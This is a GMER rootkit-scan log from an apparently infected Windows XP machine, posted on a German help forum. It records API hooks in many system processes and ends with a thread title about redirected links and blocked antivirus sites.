.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\services.exe[820] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\services.exe[820] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\services.exe[820] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\lsass.exe[832] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\lsass.exe[832] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\lsass.exe[832] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\lsass.exe[832] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Nero\Nero 7\InCD\InCD.exe[864] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\svchost.exe[1000] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\svchost.exe[1000] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\svchost.exe[1000] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\svchost.exe[1000] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\ctfmon.exe[1036] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\ctfmon.exe[1036] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\ctfmon.exe[1036] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\ctfmon.exe[1036] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\System32\svchost.exe[1116] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\System32\svchost.exe[1116] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\System32\svchost.exe[1116] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\System32\svchost.exe[1116] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 100A3DF4
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 100A3C3C
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 100A3E78
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!connect 71A14A07 5 Bytes JMP 100A3AF0
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!send 71A14C27 5 Bytes JMP 100A3264
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100A27F8
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!recv 71A1676F 5 Bytes JMP 100A278C
.text C:\Programme\Intel\Wireless\Bin\S24EvMon.exe[1176] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 100A3A9C
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Sandboxie\SbieCtrl.exe[1212] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Messenger\msmsgs.exe[1300] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Messenger\msmsgs.exe[1300] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Messenger\msmsgs.exe[1300] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Messenger\msmsgs.exe[1300] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe[1456] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\spoolsv.exe[1696] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\spoolsv.exe[1696] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\spoolsv.exe[1696] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\spoolsv.exe[1696] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] kernel32.dll!SetUnhandledExceptionFilter 7C84495D 4 Bytes [C2, 04, 00, 00]
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe[1824] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10143DF4
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10143C3C
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10143E78
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10143AF0
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!send 71A14C27 5 Bytes JMP 10143264
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 101427F8
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1014278C
.text C:\Programme\Intel\Wireless\Bin\EvtEng.exe[1872] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10143A9C
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe[1932] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe[1976] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe[2020] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\taskmgr.exe[3192] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\taskmgr.exe[3192] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\taskmgr.exe[3192] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
---- Devices - GMER 1.0.15 ----
AttachedDevice \FileSystem\Ntfs \Ntfs eamon.sys (Amon monitor/ESET)
AttachedDevice \FileSystem\Ntfs \Ntfs InCDrec.SYS (InCD File System Recognizer/Nero AG)
AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.)
AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.)
AttachedDevice \Driver\Tcpip \Device\Tcp epfwtdir.sys (ESET Antivirus Network Redirector/ESET)
AttachedDevice \FileSystem\Fastfat \Fat eamon.sys (Amon monitor/ESET)
---- EOF - GMER 1.0.15 ----
sejott |
| Themen zu Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt |
| absturz, adobe, antivirus, askbar, aufrufe, avira, bho, bluescree, browser, browseui preloader, computer, dateien gelöscht, einstellungen, eset nod32, explorer, forbidden, google, hkus\s-1-5-18, homepage, internet, internet explorer, malwarebytes' anti-malware, microsoft, ntdll.dll, opera, problem, programme, registry, rundll, scan, sekunden, software, sophos anti-rootkit, systemreparatur, temp, win32k.sys, windows, windows xp |
Baum-Darstellung